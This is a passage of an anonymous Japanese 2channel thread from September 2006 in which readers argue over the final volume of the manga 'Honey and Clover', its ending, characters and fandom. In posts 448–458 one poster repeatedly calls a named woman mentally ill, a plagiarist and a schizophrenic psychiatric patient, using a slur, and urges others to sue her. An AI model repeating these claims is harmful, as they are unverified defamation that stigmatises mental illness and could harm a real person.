「金と何とかに持ってかれるより、優しさと〜」の台詞にムカツいた。
言いたいことは判るんだが…ちょっと

419 :花と名無しさん:2006/09/08(金) 16:55:29 ID:???0
竹本は調子こきすぎ



420 :花と名無しさん:2006/09/08(金) 16:58:18 ID:???0
真山はストーカーつーかBLの片側だな
女じゃなくて男に迫るような姿勢だ
 
まあもうどうでも良い事だけど

421 :花と名無しさん:2006/09/08(金) 17:00:55 ID:???O
堺萌えだしな

422 :花と名無しさん:2006/09/08(金) 17:10:10 ID:???0
連載時と変更点は無かったよね?

423 :花と名無しさん:2006/09/08(金) 17:11:53 ID:???0
そんなこと知ってる420は



424 :花と名無しさん:2006/09/08(金) 17:13:29 ID:???0
○○パンうめぇwwwwwwwwwwwwwwwwwwwwww 

425 :花と名無しさん:2006/09/08(金) 17:50:29 ID:???0
ダメダメ漫画。腐ってた。

426 :花と名無しさん:2006/09/08(金) 18:09:48 ID:???O
>>385

427 :花と名無しさん:2006/09/08(金) 18:11:51 ID:???0
10巻、まだ読んでない。
どうですか?
名作となりましたか?

428 :花と名無しさん:2006/09/08(金) 18:17:33 ID:???0
スレの雰囲気でわかるだろうが

429 :花と名無しさん:2006/09/08(金) 18:18:47 ID:???O
最終巻で普通に感動して号泣した俺は変な人間なのかなぁ・・・

竹本もはぐの事を好きになって人間的に大きくなったし、あえて真山と山田の話を完結させないのもうまいと思った。

森田が一番可哀想に感じた。

やっぱり最後の巻なのに全員揃ったコマがなくて切なかったなぁ



430 :花と名無しさん:2006/09/08(金) 18:24:15 ID:???0
森田には馨や会社の人たちもいるし
なんだかんだで気の合うルーカス達と仕事して
はぐに見せたいものを作れたとき、幸せになれるんじゃないか
また突拍子なく現れて
作品を作ることが出来たはぐと見せ合いっこ出来れば、と

431 :花と名無しさん:2006/09/08(金) 18:27:29 ID:???0
竹本の話としては一応綺麗に纏まってはいるな。

この手のキッチリ終わらないエンドに関しては、
多くの人に受け入れられるものではないと思う。


あと、5年後10年後に続編描くのが楽なエンドだ。
やっぱりはぐが心変わりしてちゃぶ台ひっくり返す所から開始すればおk

432 :花と名無しさん:2006/09/08(金) 18:42:25 ID:???0
みんなせいかくがメソメソになっててメソメソ漫画になってしまった

433 :花と名無しさん:2006/09/08(金) 18:47:59 ID:???0
>>431
修が交通事故死した後から始まるお

434 :花と名無しさん:2006/09/08(金) 18:58:43 ID:???0
『女は最後には自分を支えて愛してくれる男を選ぶ』
ってことだな。気持ちはわかる気ガス。竹本や森田はあと五年早かった。残念。
でもたぶんこれが一番いいまとめ方だろ。

修ちゃんには[ミスターロリコン]の称号を与えたい。

435 :花と名無しさん:2006/09/08(金) 19:04:36 ID:???O
10巻買った
最後の泣きながらパン食ってる竹本みてウルッとした
普通に良かったよ
私は森田はぐ派だったからちょっと悲しいけど
何年後かにあの二人一緒にいるんじゃ…と
妄想出来る範囲の終わりだったし。

この人たまたまハチクロだけが当たったと思ってたけど
(初連載とは知らず)
読み切りも良かった
お疲れ〜

436 :花と名無しさん:2006/09/08(金) 19:16:39 ID:???0
>>427

>>18-20に10巻のあらすじが載ってるよ

437 :花と名無しさん:2006/09/08(金) 19:18:48 ID:???O
雑草サンドイッチで号泣は無理…

438 :花と名無しさん:2006/09/08(金) 19:32:16 ID:???0
たけもと君の
腸や肛門が号泣したに違いないよ。

439 :花と名無しさん:2006/09/08(金) 19:33:39 ID:???0
泣きながら雑草サンドイッチにかぶりついてる竹本は
思い出をおもいだして泣けてきたのと
マズイ食べ物に泣けてきたのとの
両方なんだろうね。

440 :花と名無しさん:2006/09/08(金) 19:41:01 ID:???O
これ10巻でおわり?デスノみたいな感じで11巻でそうなんだが

441 :花と名無しさん:2006/09/08(金) 19:52:35 ID:DJCvIN4C0
10巻読んでてイライラ
9巻あたりから、おもしろくなくなった。
なんで、しゅうちゃんははぐを好きになった境目をいうのは「かんべんして」なのさ。
それ恋愛なん?家族愛なん?
はぐみがケガしてからおかしくなってへんかな。



442 :花と名無しさん:2006/09/08(金) 20:13:34 ID:???0
ウミノたんが読者に説明できないから

443 :花と名無しさん:2006/09/08(金) 20:17:32 ID:???0
連載を読んでいるときは終盤の展開に全く納得がいかなかったが
10巻の表紙と最後の5人並んで手をつないでいる絵を見て
こりゃ単純に5人バラバラにしたかっただけなのかなと思った。
あの頃はみんな一緒で幸せだったねってオチにしたかったと。

444 :花と名無しさん:2006/09/08(金) 20:18:26 ID:p4xJCy6o0
番外編、その後の話とかをやればなぁ
なんかもやもや感が消えない

続編は・・・期待しているが・・・

445 :花と名無しさん:2006/09/08(金) 20:20:32 ID:???0
それがすごい後ろ向き青春賛歌で、
ウミノたんがハチクロで読者に伝えたかったという
「大人になるのはそんなに悪いことじゃない」ってのが全然ないじゃん。
「青春は楽しかったなあ、楽しかったなあ、楽しかったなあ…」
そんな怨念で終わってしまったよ。

446 :花と名無しさん:2006/09/08(金) 20:24:32 ID:???O
本屋にある発売予定表見たが(完)になってなかった。
11完が総集編みたいに発売されるんか?デスノみたいに。

447 :花と名無しさん:2006/09/08(金) 20:31:58 ID:???0
何で読み切り詰め込んで一冊にしたんだろ
もう一回分連載延ばせばちょうどいいし
話としてももう少しまとまっただろうに

448 :花と名無しさん:2006/09/08(金) 20:36:44 ID:O51hQcUnO
447
基地害高橋佳子がクレーム出したから
高橋佳子は基地害
岩井島子は基地害をモデルにしない

449 :花と名無しさん:2006/09/08(金) 20:37:32 ID:???0
>>446
本筋は一応終了。
スピンオフ番外編をやるらしいから、それが最終巻だと思う。

450 :花と名無しさん:2006/09/08(金) 20:37:40 ID:VRe3h+5qO
今みてるんだけど修ちゃんすげーかっこいいな

451 :花と名無しさん:2006/09/08(金) 20:40:09 ID:O51hQcUnO
高橋佳子は基地害
ドラマまるぱくした漫画書いたのは自分なのに知らないという奴

452 :花と名無しさん:2006/09/08(金) 20:41:07 ID:9fRORWcb0
9巻からいきなり大人びたはぐに
感情移入できなかった

453 :花と名無しさん:2006/09/08(金) 20:41:59 ID:VRe3h+5qO
油膜て!まごうことなき朝ですわって!

454 :花と名無しさん:2006/09/08(金) 20:42:10 ID:O51hQcUnO
基地害高橋佳子は盗作女
みんなに迷惑をかける

455 :花と名無しさん:2006/09/08(金) 20:42:58 ID:O51hQcUnO
みんなで高橋佳子を訴えましょう

456 :花と名無しさん:2006/09/08(金) 20:45:09 ID:O51hQcUnO
高橋佳子は統合失調症で精神病院通い

457 :花と名無しさん:2006/09/08(金) 20:47:03 ID:???0
高橋なんとかってのを書いているのは
批判の流れをもみ消そうとしているの?
私は批判派じゃないけどウザイ

ウミノさんヲタなのか友達なのか本人なのか

458 :花と名無しさん:2006/09/08(金) 20:48:54 ID:O51hQcUnO
高橋佳子は基地害で出版社出入り禁止
中村うさぎや岩井島子や河村隆一に迷惑かける
海野さんのマネする海好き基地害デブス

459 :花と名無しさん:2006/09/08(金) 20:50:58 ID:???0
10巻読んだ。
なんか、感動しかけてたはずなのに、
「停電したとき、ビームサーベル持って飛び出してくるんだぜ?」
で、大爆笑して何もかも吹っ飛んだ。

460 :花と名無しさん:2006/09/08(金) 20:54:50 ID:???0
ハチミツクローバーサンドは、甘くて苦い青春の思い出の味・・・グハッ吐血
つか、星のオペラで迂闊にも号泣、暗記パン最高ー

461 :花と名無しさん:2006/09/08(金) 20:55:13 ID:???0
>>457
真性はスルー
高橋NGにぶちこんでおけばさっぱりするよ

462 :花と名無しさん:2006/09/08(金) 21:04:45 ID:???0
>>459
安いハート持ちだなあ

463 :花と名無しさん:2006/09/08(金) 21:10:04 ID:???0
ウミノさんの濃いファンって、簡単に感動して泣けるんだね。
セカチューやディープラブのようなくだらない小説でも
こういう人はきっとすぐ号泣しちゃうんだろうな。

464 :花と名無しさん:2006/09/08(金) 21:11:39 ID:???O
最後ページ辺りの五人が手を繋いで礼をするフィナーレ…
修ちゃんが居ないのはやはり五人がメインと作者が思ってるから?
にしては…うーむ…
作者の修への扱いがよくわからない…

星のオペラ面白かった。読み切りだけで短編集一冊出して欲しいなぁ

465 :花と名無しさん:2006/09/08(金) 21:16:03 ID:???0
細かいことを気にしない人には楽しめるんだろうな
雰囲気だけ味わう、みたいな

466 :花と名無しさん:2006/09/08(金) 21:23:20 ID:???0
はぐのキャラじゃない普通の女だったら竹本の立場の人間は
好きな女がもう彼氏とやりまくってる姿想像して絶望して
最後の竹本のシーンは「中途半端にやさしくすんなゴラァ!」ってなるとこだわ
まあ、はぐだから良かったんだけど。

467 :花と名無しさん:2006/09/08(金) 21:36:36 ID:???0
10巻読んだ。

ウミノさんらしいフレーバーに溢れてるなとは思ったし、
ここであらすじだけ読んだ時に感じたがっくりはそれほど無かったし、
最終回は竹本くんと一緒に泣けたけど、何か釈然としない気持ちが残るなあ。
散々言われてる事だけど、女がみんな成長するのを拒否したお姫様としてしか
描かれてないからだろうなー。

キャラの暴走をじさま達に「青春じゃ青春じゃー!」って騒がせてとりあえず美化
しておけばOK☆っていうのが、なんかむかついた。

468 :花と名無しさん:2006/09/08(金) 21:37:01 ID:???0
>>466
ハチクロの世界は一部キャラを除いて
処女と童貞だけで成り立っている(大槻ケンヂの指摘)からね。

臭ちゃんまでなんか童貞くさい…。

469 :花と名無しさん:2006/09/08(金) 21:38:48 ID:???0
このスレでは少数派だけど、普通に泣けたよ。


470 :花と名無しさん:2006/09/08(金) 21:40:04 ID:???0
>>465
「いい雰囲気」を描くのは上手いからねぇ…。
ストーリーはクソなんだけど
短いシーンを切り取って感動的に見せたり
叙情的に見せるのはすごく上手いから
うっかり見て釣られて感動してしまう人が出てくるのはわかる。

このセンスはウミノさんがもともと持っていたものなのか
同人で鍛えられたのか…w

471 :花と名無しさん:2006/09/08(金) 21:53:08 ID:???0
最終回(の雰囲気)だけはよかった。
が、竹本の片思いを知った上での真山の態度だけは解せない。
手放しで感動している人は↑を忘れているんじゃないかと。

472 :花と名無しさん:2006/09/08(金) 21:56:40 ID:???O
最終回加筆してある部分よかった。

473 :花と名無しさん:2006/09/08(金) 21:58:02 ID:???0
>>469
どういうところで泣けましたか?
竹本が思い出を回想するシーンですか?

474 :花と名無しさん:2006/09/08(金) 21:58:42 ID:???0
>>473
きっとたけのこの不憫さに(ry

475 :花と名無しさん:2006/09/08(金) 22:03:52 ID:???0
最終回は良かったと思う。

でもその前の、山田の「はわわ」や
臭の「好きさ!大好きさ!」や300万ゲットや
竹本が森田のことを金と才能だけの人扱いして火病したことや
真山の、臭がはぐに恋してることを絶賛する様子やら
ジジイの青春様連呼やら、気持ち悪い犬やらが
もうどうしようもなくてなぁ。

ウミノさんの描く犬って
リーダーにしてもミドリちゃんにしても野良犬にしても
生臭そうでイヤ。

476 :花と名無しさん:2006/09/08(金) 22:15:20 ID:???0
登場人物が自分に酔い気味の(ある種舞台的な)パート、日常パート、ポエムパートのフレーバーはいいんだけど、
シリアスパートの構成やシリアスパートを、構成力の無さか作者の照れか知らないけどギャグ風に誤魔化しちゃう
のが駄目だなぁ。
9巻の「海に行く事はなかった」という前振りなのにああいう展開なのから察するに終盤は予定変更で
推敲なしで勢いだけで描いていたのかもね。

477 : ◆E6wyrLUoXk :2006/09/08(金) 22:19:15 ID:???O
今山田さんとルパン見てる
ふじこの声もうおばさんだな、ってつぶやいたら
でもぉ色っぽいよ?
と言ったその声が色っぽくて興奮した

478 :花と名無しさん:2006/09/08(金) 22:23:29 ID:???0
>>470
自分は同人よんだことないからわかんないんだけど。
そういう「同人的」っていうセンスではうみのは非常に優れている人だと思う
別に同人作家が漫画書いて売れちゃいけないわけじゃないんだしさ
逆に他の同人っぽい書き方する作家に
「これぐらいになってから書け!」っていうボーダーにはなったと思う

479 :花と名無しさん:2006/09/08(金) 22:26:39 ID:???0
ハチミツとクローバーのサンドイッチに号泣しそうになった

480 :花と名無しさん:2006/09/08(金) 22:39:06 ID:???0
>竹本が森田のことを金と才能だけの人扱いして火病したことや

まぁあれは勢いでいったんだろうけど
たけのこは日頃から森田のえげつない言動の被害者だったからなぁ
二次元キャラでギャグキャラじゃなかったら普通に同性から嫌われるタイプだろうし>森田
男の視聴者で竹本派は森田にやるくらいなら・・・って同じ事思ったんじゃない?


481 :花と名無しさん:2006/09/08(金) 22:44:05 ID:???O
>>450
どの辺が?

482 :花と名無しさん:2006/09/08(金) 22:49:49 ID:xr9MgsXQ0
終わったけど終わってないような。
だってなんか釈然としないもん。
決着ついてないじゃんいろいろいろいろ。
絵は好みだけど。

483 :花と名無しさん:2006/09/08(金) 22:52:12 ID:???0
10巻出たから様子見に来たけど余り盛り上がってないね。
コミクス派より雑誌掲載時に匙投げた人が多かったって事か。

484 :花と名無しさん:2006/09/08(金) 22:56:36 ID:???0
>>483
ファンやめた人は、雑誌掲載時に見限った人多いだろうね。
オークションでもハチクロコミックスの1〜9巻がたくさん売られてたし。

10巻に感動するようなファンは
2ちゃんだとファン的な感想は書きにくいからと
ミクシィあたりで誉めあってると思う。
ミクシィはウミノさんも見てくれるから、ファンは
感想書きごたえあるだろうよ。

485 :花と名無しさん :2006/09/08(金) 23:05:54 ID:???0
森田は美大内で女の子に人気があったし、あの森田の席のモニター、
そのうち才能にあふれた女性スタッフやら女優やらに囲まれた森田を映すようになるかも。
はぐはその後もモニター見続けるんだろか。

486 :花と名無しさん:2006/09/08(金) 23:12:39 ID:???0
その内飽きるだろw
変にモニターとか小道具持ち出さないですっぱり分かれた方が
青春の切なさが出る気がする

487 :花と名無しさん:2006/09/08(金) 23:19:24 ID:???0
>>484
ミクシか…
そうやって自分が欲しい物(賞賛)だけを求めて
居心地のいい場所に居続ける姿はまるではぐそのものですね。
そうして閉じた世界観の作家が増えていくのか。

488 :花と名無しさん:2006/09/08(金) 23:22:45 ID:???0
ミクシィだと、あのスラダンパクリをした末次由紀嬢の
マジファンのコミュニティもあるくらいだから。

サイトで暴言を吐いていた
酒井まゆ(少女漫画板では軽い祭りになってた)も
ミクシィでは強固なファンコミュニティがあって
アンチやヲチャーや2ちゃんねらーは書き込み禁止になってる。

ミクシィではアンチコミュや、アンチとまで行かないが批判や苦情は
書けないのかもしれん。

489 :花と名無しさん:2006/09/08(金) 23:24:40 ID:???O
ハチミツとクルクルパー

490 :花と名無しさん:2006/09/08(金) 23:28:41 ID:???O
山田が誰とも結ばれないで良かったわ

491 :花と名無しさん:2006/09/08(金) 23:30:56 ID:???O
mixiってかなり内向きなんですね

492 :花と名無しさん:2006/09/08(金) 23:31:38 ID:???0
え、山田は野山と結ばれたでしょ

493 :花と名無しさん:2006/09/08(金) 23:35:18 ID:???0
全員破局しちまえ

494 :花と名無しさん:2006/09/08(金) 23:38:54 ID:???O
竹本の物語としてみたらまあ良かったと思う。
はぐが恋愛より芸術に生きる事を選んだのなら納得できたけど
自分に都合のいい男を選んだとしか思えないからなあ…。

全体はぐだぐだでも、場面やセリフがいい所はがゆんに似てる。


495 :花と名無しさん:2006/09/08(金) 23:39:24 ID:???0
ハチミツとクローバーのサンドイッチに泣いた竹本のシーンで涙がこみ上げてきたよ・・・


496 :花と名無しさん:2006/09/08(金) 23:41:30 ID:???O
「雑草食えってのか!!」

497 :花と名無しさん:2006/09/08(金) 23:42:05 ID:???0
>>493
カップル成立後の話を描けなそうな気がするから続編アリだとフツーにありえそうで怖いな。
カップル成立といえば、結局竹本母は入籍&結婚したんだっけ?

498 :花と名無しさん:2006/09/08(金) 23:45:13 ID:???0
この間の高専みたいな事がリアル
この作品は非現実的な妄想空想だったな
自己マン乙

499 :花と名無しさん:2006/09/08(金) 23:46:03 ID:???O
雑草サンドイッチに思わず吹き出した私が来ましたよ
普通に押し葉で作った栞とかでよかったのにどんなダジャレだよ

500 :花と名無しさん:2006/09/08(金) 23:47:39 ID:???O
>>498
はぐがセックスも知らなさそうな幼さ子キャラな時点でファンタジーですからね

501 :花と名無しさん:2006/09/08(金) 23:54:05 ID:???0
10巻を面白いと思うのが男で、
つまんねぇんだよ糞が!って思うのが女っぽいな

502 :花と名無しさん:2006/09/08(金) 23:57:03 ID:???0
>>501
主婦ですが10巻面白かったと思いますよ

503 :花と名無しさん:2006/09/08(金) 23:58:19 ID:???0
501はいつもの厨男

504 :花と名無しさん:2006/09/09(土) 00:08:00 ID:???0
>>491
mixiはかなり閉鎖的なコミュニティだよ
集団で馴れ合うのが好きな人向き

505 :花と名無しさん:2006/09/09(土) 00:10:12 ID:???0
自分はマイミクに「ひろゆき」がいるのでミクシィに書き込めない…。
ROMのみ。

506 :花と名無しさん:2006/09/09(土) 00:10:14 ID:???0
ここではハチクロラストは主婦にはウケがいいと言われてるからな。

507 :花と名無しさん:2006/09/09(土) 00:13:19 ID:f1Nz9W/p0
雑草雑草いうけどさ
あんだけハチミツ塗ってありゃ食うことは食えるでしょ
犬のウンコから栄養が染み出した川辺に生えてる雑草とはいえな

508 :花と名無しさん:2006/09/09(土) 00:18:57 ID:???O
8巻あたりまでは、ここでの評価もそんな酷くなかったんでしょうか??

509 :花と名無しさん:2006/09/09(土) 00:23:28 ID:???0
にくちゃんでも読めば?

510 :花と名無しさん:2006/09/09(土) 00:29:01 ID:???O
うあー 発売日だって事忘れてた。コンビニ行ってくるわ。

511 :花と名無しさん:2006/09/09(土) 00:30:22 ID:???0
10巻は本編より、合コンの話と星のワルツが良かった


512 :花と名無しさん:2006/09/09(土) 01:02:49 ID:???0
10巻って初回特典版とかあるのでしょうか?

513 :花と名無しさん:2006/09/09(土) 01:19:01 ID:???0
にゃい。

514 :花と名無しさん:2006/09/09(土) 01:40:09 ID:???0
山田と森田の友情はすごくいいと思うんだけど
5人の絵のときやたらと手をつないだりして強調しなくてもいいのに。
1枚だけそういう絵があればすごくいい絵だなーって思えるのに
毎回それだからちょっと萎えてきた… 
ウミノさん的には見た目だけいうと森田山田の2人が好みなのかな?
だから野宮が見た目森田っぽかったり森田母が山田っぽかったり…

515 :花と名無しさん:2006/09/09(土) 01:42:45 ID:???0
山田と森田の関係は自分も好きだ
表紙なんかでじゃれてるのは、もしかしたらウミノさん的にも
二人に萌えてたのかもしれない

516 :花と名無しさん:2006/09/09(土) 01:47:20 ID:???0
ああいう男女の友情とか好きそうではあるね

517 :花と名無しさん:2006/09/09(土) 01:53:48 ID:???0
山田さんって
永遠の片思いの相手真山がいて
どんなに傷つけてもそばにいてくれる飲み屋がいて
自分を心配してくれる世界が認める才能の持ち主森田さんがいて
小さくてかわいくて才能があるはぐがいて
とってもうらやましい。






竹本はどこ…?


518 :512:2006/09/09(土) 01:55:54 ID:???0
>>513
d
最後にすごいのが来ると思ったんだけどなぁ…

519 :花と名無しさん:2006/09/09(土) 02:03:28 ID:???0
美脚に美乳ですし

520 :花と名無しさん:2006/09/09(土) 02:18:45 ID:USBu10Cw0
森田さんはともかくとして、たけもとがはぐをそこまで思う気持ちわかんないや。
自分探しに北海道いくのはよしとしても。
あと、やまださんが真山に執着する気持ちも。
このふたりの気持ちには説得力ないっす。


いくら四つ葉でも雑草サンドは受け入れられないっす。
すきでも、食べれないっす。

521 :花と名無しさん:2006/09/09(土) 02:21:41 ID:x50EhqGUO
修ははぐの事が大事だからはぐの近くにいる事選んだんだよな??
はぐも修が近くにいれば頑張れるから修を選んだんだろ??
はぐが都合のいい男を利用するのに選んだってのは違うと思うんだが??

キャラの性格ではぐはそんな打算的な女か??



とりあえず修は処女じゃないと思うんだがいかがだろう??
だってあの歳で彼女もいないんだからな!!

522 :花と名無しさん:2006/09/09(土) 02:23:47 ID:???0
森田ははぐみたいな不安定な子じゃなくて、
落ち着いた感じの平凡な人とくっついた方が良い。
竹本を女の子にしたみたいな。

523 :花と名無しさん:2006/09/09(土) 02:23:52 ID:x50EhqGUO
>>520恋愛下手の人だと人を好きになったら思い続けるものだよ。
すぐに切り換えれない不器用な人間なんでしょ?

524 :花と名無しさん:2006/09/09(土) 02:24:36 ID:???O
>>521
頑張れるからじゃなくて…

525 :花と名無しさん:2006/09/09(土) 02:26:25 ID:???O
>>521
本人無自覚でも結果的に打算的

526 :花と名無しさん:2006/09/09(土) 02:27:38 ID:???0
はぐと修は一緒にいることでお互いメリットがあるからいいじゃまいの。
絆も強いしさー。しかしはぐは修を男として好きなのか?

527 :花と名無しさん:2006/09/09(土) 02:29:11 ID:x50EhqGUO
>>525無自覚なら打算的というより
甘えたじゃないか??

528 :花と名無しさん:2006/09/09(土) 02:33:12 ID:???0
ID:x50EhqGUO

529 :花と名無しさん:2006/09/09(土) 02:33:21 ID:USBu10Cw0
523
なるほど〜

あとはしゅうちゃんがはぐにどこで恋愛感情をもつにいたったか。。。というなぞだけですね
異性として。。。
そこらへんあいまい

530 :花と名無しさん:2006/09/09(土) 02:35:30 ID:x50EhqGUO
>>528どうかした?

531 :花と名無しさん:2006/09/09(土) 02:48:22 ID:???0
ケータイからだろうがsageろということではないかな

532 :花と名無しさん:2006/09/09(土) 02:55:40 ID:???0
はてなあたりとか見ると割りと好評なんだけどなぁ

533 :花と名無しさん:2006/09/09(土) 02:57:43 ID:???O
>526
男性として一番好きなのは森田、だけど恋より芸術を選んだってことでは?
怪我してなくても芸術の世界でやってく決心つけたら
修をえらぶんじゃないの?
はぐと修には信頼関係と絆があるし、
森田を選ばず、修を選んだことを打算的とは思わないな。
森田さんとよろしくやっとくけど、
マネジメントとケアは、修ちゃんお願い☆、だったら打算的だけど。

ケガは先延ばしにしてた問題を動かす装置としてしか意味なかったね。
実際起きたらかなり深刻な事故や怪我というものを
そういう風に使ったことに抵抗感じる人もいるだろうけど
まあ漫画だし別にかまわないと思う。
割と怪我後のはぐや周囲の心情をきちんと描いてるし。

はぐは絵を描くって明確なビジョンがあって
才能もあって努力もしてるし、犠牲も払ってて、
社会性に欠けはするけど中身は芯が強く年相応以上に大人だと思うから
個人的には修→はぐがロリでキモいともあんま感じないんだよね。
どう感じるかは人それぞれだけど。

534 :花と名無しさん:2006/09/09(土) 03:09:21 ID:???O
年相応以上に大人(笑)

ロリロリ言われてるのは年齢のせいじゃなくて

535 :花と名無しさん:2006/09/09(土) 03:14:21 ID:???O
>520
竹本のはぐへの気持ちは何となく理解できる。
>523のようなこともあるだろうし
自分を揺さぶる存在ってこと何じゃないかと。
心をかき乱されるっていうか。
はぐの才能や強さをあらわすエピソードもあるから
その辺に圧倒され魅了(?)されたのかと。
後単純に見た目がタイプとか。一目惚れだし。


山田さんの気持ちはたんなる執着心にしか感じられなかったな。
山田が真山を好きなのは決定項!!な扱いで
好きになるきっかけや気持ちが深まる過程のエピがなかったからかな。

しかも物語が後半へいくに従って
自分のことを好いていてキツいこといったとしても
愛情からで悪いようにはしないって確定されてる野宮の前で
グチと涙の応酬で正直好感度下がったから尚更だった。

536 :花と名無しさん:2006/09/09(土) 03:16:01 ID:???O
>534
外見よりも大人だと思う。

537 :花と名無しさん:2006/09/09(土) 03:19:00 ID:???0
9〜10巻あたりのはぐにはちょっと腹立った。
はなから誰か(つうか修)巻き込むの前提で物事考えてて。
「一人でやれるとこまでやる」とか言ってくれたらかなり惚れ直してたけどねー。
打算的とまでは思わなかったけど、無自覚に甘えすぎとは思った。

とりあえず竹本が幸せになった姿が見たいですよ…。(´-`)

538 :563:2006/09/09(土) 03:22:04 ID:???O
しまった、途中だったwスマソ

もちろん外見で言われてることはわかった上で533を書いたのよ。
外見<年齢(年相応)<中身、大人ってことで。
わかりにくくてごめんなさい。

539 :花と名無しさん:2006/09/09(土) 03:23:06 ID:???0
竹本なら仕事先であった娘さんと仲良くなってたよ

540 :花と名無しさん:2006/09/09(土) 03:34:43 ID:???0
山田さん、最初は普通っぽい女の子だったのに、
最後には「合コンでモテモテ」とか
とにかくちやほやされる姫設定になってたのが嫌だった。
先生の「大好きさ」発言のあとの
あわわわっていうのも、急に幼すぎるキャラになってたし。
女キャラがみんな、周りに何かしてもらうだけで自立していないのが嫌だ・・・。



541 :花と名無しさん:2006/09/09(土) 03:36:09 ID:???0
美和子ねーさんだけが自立してるっぽい設定かな

542 :花と名無しさん:2006/09/09(土) 03:38:40 ID:???0
美和子もいいトシのハズなのに乙女チックでキモイ。

つかこの漫画の女は「自分に関する恋に鈍感」がデフォでキモイ。

543 :花と名無しさん:2006/09/09(土) 03:39:58 ID:???0
自分に関する恋に鈍感?どういう意味?

544 :花と名無しさん:2006/09/09(土) 03:50:11 ID:???O
モテモテなのに気づかないアテクシ☆彡
っての?

545 :花と名無しさん:2006/09/09(土) 03:53:51 ID:???0
>モテモテなのに気づかないアテクシ☆彡

しかも周りみんな恋心に気づいているのに本人だけ気づかないってあり?

546 :花と名無しさん:2006/09/09(土) 03:56:27 ID:???0
商店街のみなさんとかの恋は気付いてたよね



547 :花と名無しさん:2006/09/09(土) 04:00:22 ID:???0
普通にあのサンドイッチは食べたくないよね。
でも、前にあんなに探しても見つからなかったのにね。四葉。
竹本は嬉しかっただろうね。

548 :花と名無しさん:2006/09/09(土) 04:01:39 ID:???0
マンガですから・・・

549 :花と名無しさん:2006/09/09(土) 04:01:51 ID:???0
別の土手には四葉が密集して群生してましたとさ

550 :花と名無しさん:2006/09/09(土) 04:09:57 ID:???0
はぐは森田を好きなのに、芸術のために先生を選んだって事みたいだけど・・・
恋愛したり、失恋して傷ついたり、人とぶつかって傷ついた経験が
芸術の糧になることだってあるんじゃなかろうか・・・

先生に守られて、他人とぶつかって交流しようともしないはぐが
芸術家として良い物を残せるんだろうかと思う。

551 :花と名無しさん:2006/09/09(土) 04:19:02 ID:???O
絵は好きだなぁ
ファンタジー描くの好きみたいだし、描いてほしいな
読んでみたい

552 :花と名無しさん:2006/09/09(土) 04:19:55 ID:???O
>542
リカさんは違わない?>自分(に対する)の恋(愛感情)に関して鈍感

美和子さんはまだもうちょっと山崎で遊びたいから
あえて知らん顔してるって脳内補完してた。

山田さんは恋愛関係だけじゃなくて
けっこういろんなことに鈍感てか気がまわないっぽい。
おおざっぱていうか。だからこそさっぱりした性格でいてほしかったのになぁ。

553 :花と名無しさん:2006/09/09(土) 04:29:15 ID:???0
はぐは結局修を選んだことで引きこもることになったんだよ。
言い換えればモラトリアム。いつまでもそこに留まる存在。
最後に竹本のモノローグでもいってたように、みんなが浜美を去って別の人生を歩んでいくのに
はぐだけはこれからも変わらない日常を送っていく。永遠のモラトリアム、それがはぐ。
それは修といることによってもたらされた。

はぐが大人になるためには森田という別の才能との交流を続けなければならなかった。
もっと外界とつながりをもつべきだった。だが修を選んだことでその可能性は絶たれた。
最悪の決断だね。

554 :花と名無しさん:2006/09/09(土) 04:56:58 ID:???0
羽海野さんとはぐを重ねて見てみると離婚した理由は、
相手が修よりも森田系だったからかな?なんて思う。

555 :花と名無しさん:2006/09/09(土) 05:00:16 ID:???0
クローバーが密生しているところって
犬がジャージャーうんこしっこしてそう。
竹本君、仕事開始早々腹に虫が湧いて倒れる。


556 :花と名無しさん:2006/09/09(土) 05:00:30 ID:NkoDWbvfO
青春じじいがウゼー

557 :花と名無しさん:2006/09/09(土) 05:01:35 ID:???0
私は「GJビシィィィィッ☆」っていうのがたまらなく嫌い。

558 :花と名無しさん:2006/09/09(土) 05:05:37 ID:???O
とりあえず竹本くんには恋愛仕事で失敗して二丁目辺りのゲイバーで店子として働き
ハムの先輩と出会い救われるという話が見たい

559 :花と名無しさん:2006/09/09(土) 05:09:12 ID:???0
美和子さんは、噂好きなおばちゃんみたいに
アレコレ首突っ込んでくるのが嫌だった。
あとリカさん萌えしてたのも。

初期の鉄人山田が一番好きな女キャラだ。

560 :花と名無しさん:2006/09/09(土) 05:37:36 ID:???O
はぐはいい選択したと思うよ。森田とだったら恐らく二人で引き込もってしまう。
はぐも修もお互い一緒にいることで初めて外の世界に踏み出す事ができるんだと思う。
ある芸術家はパートナーをスフィンクスに例えてる。
近いんじゃないかなぁ


561 :花と名無しさん:2006/09/09(土) 05:50:26 ID:???0
10巻の印象
おにぎりとパン

562 :花と名無しさん:2006/09/09(土) 07:10:24 ID:???0
>>542-544
自分がモテモテなのに気付かないアテクシ=
まるでときメモガールズサイドの主人公みたい(キライな女のタイプ)

563 :花と名無しさん:2006/09/09(土) 07:30:13 ID:???0
つーか結婚したい男、人生のパートナーとして最良と思った相手は
異性としての好意があるだけじゃ駄目なんだよな
たしかに森田には惹かれるものがあったろうが、ずっと一緒にいて
疲れない気苦労のなさそうな気心の知れた幼馴染の方がそういう意味で
分があったんだろう

はぐの方は凄いこの選択納得出来るんだけど、修の方が唐突だったんだよね
はぐがあんなろり系のヴィジュアルじゃなくて竹本や森田みたいに異性としての
意識が伏線としてはられてたら結末もすんなり受け止めれたんだろうけど
直前まで山田父みたいな鉄壁キーパーの保護者ポジションだったからなぁ

まぁ個人的には許容範囲だったからいいけど

564 :花と名無しさん:2006/09/09(土) 07:38:30 ID:???0
    _____
   /二二ヽ
   ||・ω・||  < 受け止めれたってオマエ
.  ノ/  />
  ノ ̄ゝ       このマンガに何に魅かれて読んでいた? 
    _____
   /二二ヽ
   ||・ω・||  < 受け止めれたってオマエ
.  ノ/  />
  ノ ̄ゝ       疾走感に魅かれて読んできたんじゃないのか?

    _____
   /二二ヽ
   ||・ω・||  < 受け止めれたってオマエ
.  ノ/  />
  ノ ̄ゝ        えらく寛容だなオイ

565 :花と名無しさん:2006/09/09(土) 07:45:19 ID:???0
>>564
可愛いな、お前

566 :花と名無しさん:2006/09/09(土) 07:51:30 ID:???0
♪くまの子みていたかくれんぼ〜
♪おしりを出した子一等賞〜

567 :花と名無しさん:2006/09/09(土) 08:02:26 ID:???0
星のオペラよかった。またあんなかんじの読みたい。

568 :花と名無しさん:2006/09/09(土) 08:31:00 ID:???0
初期に戻って
修×リカ
はぐ×森田
山田×メガネ
でまとまればノリもコミカルにうまくいった気が



たったったけっ、たけ本は馨と森田語りでもして(ry

569 :花と名無しさん:2006/09/09(土) 08:40:17 ID:???0
インタビュー、ウミノも痛いけどインタビューしてる人も無神経な感じだね

